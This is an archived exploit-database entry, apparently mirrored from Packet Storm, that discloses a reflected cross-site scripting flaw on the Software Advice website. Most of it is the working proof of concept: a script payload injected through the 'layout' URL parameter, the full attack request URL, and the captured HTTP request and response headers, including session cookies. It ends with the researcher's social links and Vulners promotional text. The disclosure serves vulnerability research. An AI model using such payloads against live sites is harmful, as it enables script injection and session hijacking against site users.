Vulners
Lucene search
Software Advice 1.0 Cross Site Scripting
🗓️ 28 May 2018 00:00:00Reported by Ismail TasdelenType 
packetstorm🔗 packetstormsecurity.com👁 23 Views
`# Exploit Title: [ Reflected XSS at Software Advice ]
# Date: [27.05.2018]
# Exploit Author: [Ismail Tasdelen]
# Vendor Homepage: [https://www.softwareadvice.com/]
# Software Link: [ Software Advice Website ]
# Version: 1.0
# Tested on: Kali Linux
# Reflected XSS Payload : '-confirm`Ismail Tasdelen`-'
# HTTP REQUEST HEADER :
Request URL: https://www.softwareadvice.com/hr/workable-profile/?layout=%27-confirm`Ismail%20Tasdelen`-%27
Request Method: GET
Status Code: 200
Remote Address: 23.221.165.35:443
Referrer Policy: no-referrer-when-downgrade
:authority: www.softwareadvice.com
:method: GET
:path: /hr/workable-profile/?layout=%27-confirm`Ismail%20Tasdelen`-%27
:scheme: https
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
accept-encoding: gzip, deflate, br
accept-language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
cache-control: max-age=0
cookie: PHPSESSID=84ghfoei5qehtisf94lk187es6; optimizelyEndUserId=oeu1527439807853r0.3055516258919597; _ga=GA1.2.53898763.1527439811; _gid=GA1.2.242573448.1527439811; hasSeenCookiesConsent=1; __utma=24246072.53898763.1527439811.1527439812.1527439812.1; __utmc=24246072; __utmz=24246072.1527439812.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IR_gbd=softwareadvice.com; IR_PI=1527439811848.llloh2aehwq; lc_sso7520261=1527439812306; _gu=fc0f39ef-3375-48f4-8a23-f2bc31885a3a; __lc.visitor_id.7520261=S1527439814.38416b2f19; _gs=2.s(src=https://www.softwareadvice.com/hr/workable-profile/?layout=%27-confirm`Ismail%20Tasdelen`-%27)c[Desktop,Chrome,25:347:7992:,Windows,212.253.204.84]; __utmb=24246072.8.10.1527439812; _uetsid=_uetabcf556c; IR_8018=1527440320552%7C0%7C1527439811848; _gw=2.u[~0,~0,~0,~0,~0]v[~f5n0a,~8,~0]a()
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36
# HTTP RESPONSE HEADER :
accept-ranges: bytes
browser-cache: none
cache-control: max-age=0, no-cache, no-store
cache-type: default
content-encoding: gzip
content-length: 38319
content-type: text/html; charset=UTF-8
date: Sun, 27 May 2018 17:00:18 GMT
expires: Sun, 27 May 2018 17:00:18 GMT
front-end-https: on
hosted: web24
p3p: CP="CAO PSA OUR"
pragma: no-cache
server: nginx
status: 200
strict-transport-security: max-age=31536000
vary: Accept-Encoding
x-varnish: 10849666
x-varnish-cache: pass
x-varnish-ttl: 0
# Query String Parametres :
layout: '-confirm`Ismail Tasdelen`-'
# You want to follow my activity ?
https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 May 2018 00:00Current
0.2Low risk
Vulners AI Score0.2